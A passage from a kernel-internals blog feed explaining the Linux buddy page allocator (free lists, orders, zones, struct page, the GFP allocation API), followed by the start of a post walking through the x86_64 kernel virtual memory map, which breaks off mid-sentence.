};</code></pre><figcaption><strong>simplified</strong> from <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h">/include/linux/mmzone.h</a></figcaption></figure><p>Each <code>struct free_area</code>&apos;s linked list points to free, physically contiguous chunks of memory which are all the same size. The buddy allocator uses the index into the freelist, <code>free_area[]</code>, to categorise the size of these free chunks of memory. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/image-3.png" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="859" height="208" srcset="https://sam4k.com/content/images/size/w600/2022/06/image-3.png 600w, https://sam4k.com/content/images/2022/06/image-3.png 859w" sizes="(min-width: 720px) 720px"></figure><p>This index is called the &quot;order&quot; of the list, such that the size of the free chunks of memory pointed to are of size <code>2<sup>order</sup> * <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18">PAGE_SIZE</a></code>, such that:</p><ul><li><code>free_area[0]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>0</sup> * 0x1000</code> bytes == <code>0x1000</code> bytes AKA order-0 pages. </li><li><code>free_area[1]</code> points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>1</sup> * 0x1000</code> bytes == <code>0x2000</code> bytes AKA order-1 pages.</li><li>...</li><li><code>free_area[<a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L28">MAX_ORDER</a>]</code> -&gt; points to a <code>struct free_area</code> whose <code>free_list</code> contains a list of free chunks of physically contiguous memory; each being <code>2<sup>MAX_ORDER</sup> * 0x1000</code> bytes</li></ul><p>Okay, what&apos;s this got to do with buddies Sam?! Good question! One that brings us onto how the buddy allocator (de)allocates all this free memory it tracks.</p><p>Being the buddy <strong><em>allocator</em></strong>, it provides an API for users to both allocate and free all these various sized, physically contiguous chunks of memory. If we want to call the equivalent of <code>allocate(0x4000 bytes)</code>, what does this look like at a high level?</p><p>1) Determine what order-n page satisfies the size of our allocation, in maths world, they do this via log stuff: <code>log<sub>2</sub>(alloc_size_in_pages)</code>, rounded up to the nearest int, will give us the appropriate order! Here, it&apos;s 2.</p><p>2) As the order is also the index into the freelist, we can check the corresponding <code>free_area[2]-&gt;free_list</code> to find a free chunk. If there is one, hoorah! We dequeue it from the list as it&apos;s no longer free and we can tell the caller about their newly acquired memory</p><p>3) However, if <code>free_area[2]-&gt;free_list</code> is empty, the buddy allocator will check the <code>free_list</code> of the next order up, in this case <code>free_area[3]-&gt;free_list</code>. If there&apos;s a free chunk, the allocator will then do the following:</p><ul><li>Remove the chunk from <code>free_area[3]-&gt;free_list</code></li><li>Half the chunk (as any order-n page is guaranteed to be exactly twice the size of the order-n-1 page, as well as being physically contiguous in memory), creating two buddies! (I told you we&apos;d get round to it!)</li><li>One chunk is returned to the caller who requested the allocation, while the other chunk is now migrated to the order-n-1 list, <code>free_area[2]-&gt;free_list</code> in this case</li><li>On freeing, the allocator will check for physically adjacent, free chunks (buddies!) to remerge to higher orders if a <code>free_list</code> has too many freed chunks</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2022/06/buddy_split.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="732" height="172"><figcaption>that&apos;s right, i made a gif</figcaption></figure><p>4) If <code>free_area[3]-&gt;free_list</code> is also empty, the allocater will continue to check the higher order freelists until either it finds a free chunk or the request fails (if there are no free chunks in any of the higher orders either). </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/we_made_it.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="200"></figure><p>And there we are, a grossly-simplified (as always) overview of the buddy allocator within the Linux kernel. Perhaps I made a mistake intertwining code snippets and kernel specifics with a simplified approach, but hopefully it all made sense!</p><h3 id="nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</h3><p>Okay, so we&apos;ve covered things at a fairly high level, but I&apos;d be remiss if I didn&apos;t clarify some of the specifics I glossed over in the last section, so buckle up.</p><p>First of all, in theme with our on going virtual memory series, let&apos;s clarify what exactly is being allocated here. We already know we&apos;re dealing with pages of memory, but where? </p><p>The buddy allocator is a virtual memory allocator, although it does so from the kernel region defined by <code>__PAGE_OFFSET_BASE</code> (aka lowmem aka physmap) which you&apos;ll recall<sup><a href="https://sam4k.com/linternals-virtual-memory-part-3/">[1]</a></sup> is a 1:1 virtual mapping of physical memory. Such that lowmem address x+1 will map to physical address y+1, x+2 to y+2, x+N to y+N etc; virtually contiguous memory from this region is guaranteed also to be physically contiguous too. </p><p>Keeping things relatively brief again, the Linux kernel organises physical memory into a tree-like hierarchy of <em>nodes</em> made up of <em>zones</em> made up of <em>pages frames<sup>[2]</sup>:</em></p><ul><li><strong>Nodes</strong>: these data structures, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L934">pg_data_t</a></code>, are abstractions of actual physical hardware stuff, specifically a node represents a &quot;bank&quot; of physical memory</li><li><strong>Zones</strong>: suffice to say nodes are made up of zones, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L514">struct zone</a></code>, which represent ranges within memory </li><li><strong>Page frames</strong>: zones are then page up of pages, represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72">struct page</a></code>. Where a page describes a fixed-length (<code>PAGE_SIZE</code>) contiguous block of virtual memory, a page frame is a fixed-length contiguous block of physical memory that pages are mapped to</li></ul><h4 id="expanding-on-freearea">Expanding on <code>free_area</code></h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/why_doing_this_to_me.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>Why am I burdening you with this knowledge? The answer is because not only did I leave out some details in the code snippet above by I straight up altered it (it was for your own good, I swear), so now I&apos;m going to correct my wrongs by unveiling the truth:</p><pre><code class="language-C">struct free_area {
    struct list_head    free_list[MIGRATE_TYPES]; 
    unsigned long       nr_free;
};

struct zone {
    ...
    /* free areas of different sizes */
    struct free_area    free_area[MAX_ORDER]; 
    ...
}</code></pre><p>Okay, let&apos;s unpack this. The buddy allocator actually keeps track of multiple freelists, <code>free_area[]</code>, specifically one per zone. We can see that here, as the freelist is actually a member of the <code>struct zone</code> which we touched on a moment ago.</p><p>Why? Err, good question. I won&apos;t delve into the nuances of NUMA/UMA systems and all that stuff but suffice to say when the buddy allocator is asked to allocate some memory, it may want to pick a zone from the node that is associated with the calling context (think &quot;closest&quot; node or most optimal).</p><p>Now that we have the full(ish) context, we can do a little bit of introspection and get some hands on using our ol&apos; faithful <code>procfs</code>:</p><pre><code>$ cat /proc/buddyinfo 
----- zone info ------|    0   |  1   |  2   |  3   |  4   |  5   |  6   |  7   |  8   |  9   | 10  
-------------------------------------------------------------------------------------------------
Node 0, zone      DMA      0      0      0      0      0      0      0      0      1      1      2 
Node 0, zone    DMA32  11311   2358   1052    567    290    123     52     33     18     25      8 
Node 0, zone   Normal   5977    942   2093   1983    804    256     93     45     28     39      4 </code></pre><p>I&apos;ve added some headers in (lines 2-3), but what we&apos;re seeing here is a row for each zone&apos;s buddy allocator freelist, <code>free_area[MAX_ORDER]</code>. The first column tells us the node and zone, then each column after that tells us how many free pages (<code>nr_free</code>) there are for each page order, starting from order 0 and moving to order <code>MAX_ORDER</code>. Neat, right?</p><p>Moving back to the deception, the doubly linked circular list we said pointed to all the free chunks? Well that&apos;s actually an array of linked circular lists: <code>free_list[MIGRATE_TYPES]</code>. Don&apos;t worry though, each list in the array still points to free chunks. Pages of different types, defined by the enum <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L67">MIGRATE_TYPES</a></code>, are just stored in seperate lists in this array.</p><h4 id="touching-on-struct-page">Touching on <code>struct page</code></h4><p>Although I&apos;m planning to cover this in much more detail in the virtual memory series, I feel like it&apos;s worth touching on this goliath as to fill in some gaps in our overview.</p><p>So we&apos;ve already mentioned that each physical page (page frame) in the system has a <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mm_types.h#L72">struct page</a></code> associated with it. This tracks various metadata and is instrumental to the kernel&apos;s memory management model.</p><p>Given that these represent physical pages, it might not come as a surprise to learn that the &quot;free chunks&quot; that <code>free_area-&gt;free_list</code> points to are actually references to page structs. We can see that here by poking around <a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L2986">mm/page_alloc.c</a>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/*
 * Do the hard work of removing an element from the buddy allocator.
 * Call me with the zone-&gt;lock already held.
 */
static __always_inline struct page *
__rmqueue(struct zone *zone, unsigned int order, int migratetype,
						unsigned int alloc_flags)</code></pre><figcaption>Note the return type here, struct page * (we also see familiar qualifiers: zone, order, migrate type and flags)</figcaption></figure><p>Okay, whew, with that all cleared up, I think we have a reasonable overview of the buddy allocator within the Linux kernel! Hope you&apos;re still with me as we&apos;re not done yet!</p><hr><ol><li><a href="https://sam4k.com/linternals-virtual-memory-part-3/">https://sam4k.com/linternals-virtual-memory-part-3/</a></li><li>More on the topic here <a href="https://www.kernel.org/doc/gorman/html/understand/understand005.html">https://www.kernel.org/doc/gorman/html/understand/understand005.html</a></li></ol><h3 id="using-the-buddy-allocator">Using The Buddy Allocator</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/i_want_to_try.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="268"></figure><p>I figured I should get into the habit of promoting some kernel development hijinx and explore some of the APIs for the topics we discuss where relevant. </p><p>Let&apos;s dive in then and highlight some of the API exposed to kernel developers for use in modules &amp; device drivers. All defs can be found in <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h">/include/linux/gfp.h</a></code>: &#xA0;</p><ul><li><code>alloc_pages(gfp_mask, order)</code>: Allocate 2<sup><em>order</em></sup> pages (one physically contiguous chunk from the order N freelist) and return a <code>struct page</code> address</li><li><code>alloc_page(gfp_mask)</code>: macro for <code>alloc_pages(gfp_mask, 0)</code></li><li><code>__get_free_pages(gfp_mask, order)</code> and <code>__get_free_page(gfp_mask)</code> mirror the above functions, except they return a virtual address to the allocation as opposed to a <code>struct page</code></li><li>For freeing options include: <code>__free_page(struct page *page)</code>, <code>__free_pages(struct page *page, order)</code> and <code>free_page(void *addr)</code></li><li>Plenty more to see if you take a browse of <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h">/include/linux/gfp.h</a></code></li></ul><p>Most of that should be fairly familiar at this point, except the <code>gfp_mask</code>, which we haven&apos;t covered. The <code>gfp_mask</code> is a set of GFP (Get Free Page) flags which lets us configure the behaviour of the allocator and are used across the kernels memory management stuff.</p><p>The inline documentation<sup><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">[1]</a></sup> already does a good job at covering the different flags, so I won&apos;t rehash that here. My experience has mainly seen <code>GFP_KERNEL</code>, <code>GFP_KERNEL_ACCOUNT</code><sup>[2]</sup>, <code>GFP_ATOMIC</code>.</p><p>Despite a flexible API for different allocation use cases and requirements, they all ultimately call the real MVP, <code>__alloc_pages()</code>: </p><figure class="kg-card kg-code-card"><pre><code>/*
 * This is the &apos;heart&apos; of the zoned buddy allocator.
 */
struct page *__alloc_pages(gfp_t gfp, unsigned int order, int preferred_nid,
							nodemask_t *nodemask)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.3/source/mm/page_alloc.c#L5370">/mm/page_alloc.c</a></figcaption></figure><p>We&apos;ve already covered a lot of ground in this post, so I&apos;ll leave it as an exercise to the reader to take a look at this function to see what we&apos;ve covered so far in actual code :)</p><p>I&apos;ll also use this as an opportunity to plug my long neglected repo (but I plan to push some demos for Linternals posts up too, maybe), &quot;lmb&quot; aka Linux Misc driver Boilerplate; a very lightweight kernel module boilerplate for bootstraping kernel fun. </p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/lmb"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.</div><div class="kg-bookmark-description">Very lightweight kernel module boilerplate for kernel development/testing. - GitHub - sam4k/lmb: Very lightweight kernel module boilerplate for kernel development/testing.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/6f1e8f53726bbb637614ea9872b48678653de986a0f9087367d6c97501146f39/sam4k/lmb" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"></div></a></figure><hr><ol><li><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271">https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/gfp.h#L271</a></li><li><a href="https://twitter.com/poppop7331">@poppop7331</a> and <a href="https://twitter.com/vnik5287">@vnik5287</a> recently <a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">did a cool blog</a> post covering modern heap exploitation, including the implications of <code>GFP_KERNEL_ACCOUNT</code> in recent kernel versions :) </li></ol><h3 id="pros-cons">Pros &amp; Cons</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/impatient_judy.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="234" height="176"></figure><p>Before we wrap up, and to give some context on the next section, let&apos;s take what we&apos;ve learned about the buddy allocator and highlight some of it&apos;s pros and cons.</p><p>First of all, due to the nature of the buddy system algorithm behind things, the buddy allocator is fast to (de)allocate memory. Furthermore, being able to split and remerge chunks on the go, there is little external fragmentation (this is where there&apos;s enough free memory to serve a request, just not in one contiguous chunk).</p><p>There&apos;s also other perf benefits, that we won&apos;t dive into here, to providing physically contiguous memory and guaranteeing cache aligned memory blocks.</p><p>The main downside here is the internal fragmentation, where the chunk of memory allocated is bigger than necessary, leaving a portion of it unused. Due to the fixed sizes, determined by 2<sup>order</sup> pages, if a request falls just too big for the previous order, we&apos;re gonna have a great deal of space wasted. Not to mention the smallest allocation is 1 page.</p><p>tl;dr: fast, contiguous allocations, low external fragmentation, bad internal fragmentation</p><h3 id="wrapping-up">Wrapping Up</h3><p>Memory allocation and management is an extremely complex topic with a lot of nuance and complexity which, as we saw, extends down to the hardware level. </p><p>Hopefully this has been a useful primer on one of the fundamentals to kernel memory allocation, the buddy allocator:</p><ul><li>We covered the role of memory allocators briefly, before learning that the buddy allocator acts as a fundamental memory allocation mechanism within the Linux kernel</li><li>We learned at a high level about the buddy system algorithm behind the buddy allocator, with some peaks into the actual kernel code from the mm system</li><li>Finally we pieced together our understanding with some extras on how memory is managed by the kernel, it&apos;s API and the pros/cons of the buddy allocator</li></ul><h2 id="next-time">Next Time!</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/hooray.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>The fun doesn&apos;t end here, don&apos;t you worry! We&apos;ve just scratched the surface. I hope you&apos;re ready to expand your repertoire of acronyms cos next time we&apos;ll be exploring the wonderful world of slab allocators: SLAB, SLUB &amp; SLOB. </p><p>Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that&apos;s for next time!</p><p>Thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :) </p><p>exit(0);</p><p></p>]]></content:encoded></item><item><title><![CDATA[Linternals: The Kernel Virtual Address Space]]></title><description><![CDATA[In this part of our journey into virtual memory in Linux, we cover the mystical kernel memory map and all it entails.]]></description><link>https://sam4k.com/linternals-virtual-memory-part-3/</link><guid isPermaLink="false">623768ce1b5b6d052837b4de</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 10 May 2022 19:30:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals-1.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/linternals-1.gif" alt="Linternals: The Kernel Virtual Address Space"><p>Alright, we really made it to part 3 eh? Not bad! Before we dive straight in, let&apos;s quickly go over what we covered in the <a href="https://sam4k.com/linternals-virtual-memory-0x02/">last part</a> on the user virtual address space:</p><ul><li>Very brief overview, with some examples, of using <code>procfs</code> for introspection</li><li>The various mappings that make up a typical user virtual address space</li><li>Which syscalls userspace programs make use of to set up their virtual address space</li><li>Finally tying up some extras with how threading &amp; ASLR fit into this picture</li></ul><p>This time we&apos;ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let&apos;s get stuck into chapter 5!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/unlimited_power.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="204"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</a>
<ul>
<li><a href="#one-mapping-to-rule-them-all">One Mapping To Rule Them All</a></li>
<li><a href="#kernel-virtual-memory-map">Kernel Virtual Memory Map</a></li>
<li><a href="#wrapping-up">Wrapping Up</a>
<ul>
<li><a href="#digging-deeper">Digging Deeper</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</h2><p>Casting our minds back to <a href="https://sam4k.com/linternals-virtual-memory-part-1/">part 1</a>, we&apos;ll recall that:</p><ul><li>Each process has it&apos;s own, sandboxed virtual address space (VAS)</li><li>The VAS is vast, spanning all addressable memory</li><li>This VAS is split between the User VAS &amp; Kernel VAS<sup>[1]</sup></li></ul><p>As we touched on in part 1, and more so in part 2, to even set up it&apos;s user VAS a process needs the kernel to carry out a series of syscalls (<code>brk()</code>, <code>mmap()</code>, <code>execve()</code> &#xA0;etc.)<sup>[2]</sup>.</p><p>This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??). </p><p>So if we&apos;re in usermode and we need the kernel to do something, like <code>mmap()</code> some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.</p><p>Essentially, a syscall acts as a interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number &amp; it&apos;s arguments.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/image.png" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="771" height="251" srcset="https://sam4k.com/content/images/size/w600/2022/05/image.png 600w, https://sam4k.com/content/images/2022/05/image.png 771w" sizes="(min-width: 720px) 720px"></figure><p>This way the kernel can look up the function corresponding to the syscall number, sanitise the arguments (the userspace has no power here after all) and if everything looks good, it can carry out the privileged work, return to the syscall handler which can transition back to usermode, only allowing one thing to cross over: the result of the syscall.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/where_you_going.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="270"></figure><p>This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall<sup>[3]</sup>, what is it running and how does it know where to find it?</p><p>And THAT is where the kernel virtual address space comes in. Got there eventually, right?</p><hr><ol><li>The VAS is often so vast (e.g. on 64-bit systems), that rather than splitting the entire address space an upper &amp; lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.</li><li>We touched more on syscalls back in part 1, <a href="https://sam4k.com/linternals-virtual-memory-part-1/#user-mode-kernel-mode">&quot;User-mode &amp; Kernel-mode&quot;</a></li><li>In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that&apos;s something you&apos;d be into, feel free to poke me on <a href="https://twitter.com/sam4k1">Twitter</a></li></ol><h3 id="one-mapping-to-rule-them-all">One Mapping To Rule Them All</h3><p>Okay, so I know we&apos;re all eager to dig around the kernel VAS, but it&apos;s worth noting a fairly fundamental difference here: while each process has it&apos;s own unique user VAS, <strong>they all share the same kernel VAS</strong>.</p><p>Huh? What exactly does this mean? Well, to put simply, all our processes are interacting with the same kernel, so each process&apos;s kernel VAS maps to the same physical memory.</p><p>As such, any changes within the kernel will be reflected across all processes. It&apos;s important to note, and we&apos;ll cover the why in more detail later, when we&apos;re in usermode we have no read/write access to this kernel virtual address space.</p><p>This is an extremely high-level overview of the topic and the actual details will vary based on architecture &amp; security mitigations, but for now just remember that all processes share the same kernel VAS.</p><h3 id="kernel-virtual-memory-map">Kernel Virtual Memory Map</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/andsoitbegins.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="200"></figure><p>Unfortunately things aren&apos;t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace varies depending on architecture and unfortunately there isn&apos;t easy-to-visualise introspection via <code>procfs</code>.</p><p>As I&apos;ve mentioned before in Linternals, I&apos;ll be focusing on <code>x86_64</code> when architecture specifics come into play. So although we don&apos;t have <code>procfs</code>, we do have kernel docs!</p><p><code><a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">Documentation/x86/x86_64/mm.txt</a></code>, specifically, provides a <code>/proc/self/maps</code>-esque breakdown of the <code>x86_64</code> virtual memory map, including both UVAS &amp; KVAS; which is perfect for us<sup>[1]</sup>:</p><pre><code>========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________</code></pre><p><strong>Line 5</strong>: We&apos;ve touched on this previously, the lower portion of our virtual addresses space<sup>[2]</sup> makes up the userspace. Size varies per architecture. </p><p><strong>Line 8</strong>: Remember how the virtual address spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.</p><p><strong>Line 16</strong>: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble), nowadays the space is also used to load hypervisors into.</p><p><strong>Line 17</strong>: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments<sup><a href="https://en-academic.com/dic.nsf/enwiki/1553430">[3]</a></sup>. </p><p>When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.</p><p><strong>Line 18</strong>: Defined by <code>__PAGE_OFFSET_BASE</code>, the &quot;physmap&quot; (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.</p><p>To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it&apos;s been mapped to actual points to some physical memory where that&apos;s been loaded to. </p><p>In another process, with it&apos;s own virtual address space, that same virtual address may be mapped to a completely different physical memory address.</p><p>Unlike typical virtual addresses (we&apos;ll touch on how they&apos;re translated), addresses in the physmap region are called kernel logical addresses. Any given kernel logical address is a fixed offset (<code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36">PAGE_OFFSET</a></code>) from the corresponding physical address. </p><p>E.g. <code>PAGE_OFFSET == physical address 0x00</code>, <code>PAGE_OFFSET+0x01 == physical address 0x01</code> etc. etc.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/confused_larry.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="268"></figure><p><strong>Line 19</strong>: Not much more to say about these, other than it&apos;s an unused region!</p><p><strong>Line 20</strong><sup><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">[4]</a></sup>: Defined by <code>VMALLOC_START</code> and <code>VMALLOC_END</code>, this virtual memory region is reserved for non-contiguous physical memory allocations via the <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146">vmalloc()</a></code> family of kernel functions (aka highmem region). </p><p>This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the <code>vmalloc</code> region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered). &#xA0;	</p><p>This region is also used by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207">ioremap()</a></code>, which doesn&apos;t actually allocate physical memory like <code>vmalloc()</code> but instead allows you to map a specified physical address range. E.g. allocating virtual memory to map I/O stuff for your GPU.</p><p>To oversimplify, though we&apos;ll expand on later, as this region isn&apos;t simply <code>physical address = logical address - PAGE_OFFSET</code>, there&apos;s more overhead behind the scenes using <code>vmalloc()</code> which uses virtual addressing than say <code>kmalloc()</code>, which returns addresses from the physmap region.</p><p><strong>Line 21</strong>: Another unused memory region!</p><p><strong>Line 22</strong><sup><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">[5]</a></sup>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135">VMEMMAP_START</a></code>, this region is used by the <code><a href="https://www.kernel.org/doc/html/latest/vm/memory-model.html">SPARSEMEM</a></code> memory model in Linux to map the <code>vmemmap</code>. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.</p><p><strong>Line 23</strong>: Aaand another unused memory region!</p><p><strong>Line 24</strong><sup><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">[6]</a></sup>: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, <code>CONFIG_KASAN=y</code>, this region is used as shadow memory by KASAN.</p><p>This basically means KASAN uses this shadow memory to track memory state, which it can then compare later on with the original memory to make sure there&apos;s no shenanigans or undefined behaviour going on. </p><p><strong>Line 30</strong>: You get the idea, unused. </p><p><strong>Line 31</strong>: Straight from the comments, defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157">CPU_ENTRY_AREA_BASE</a></code>, &quot;<em>cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code&quot;<sup><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">[7]</a></sup>. </em>The <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">struct cpu_entry_area</a></code> can share more insights on its role.</p><p><code>CPU_ENTRY_AREA_BASE</code> is also used by <code><a 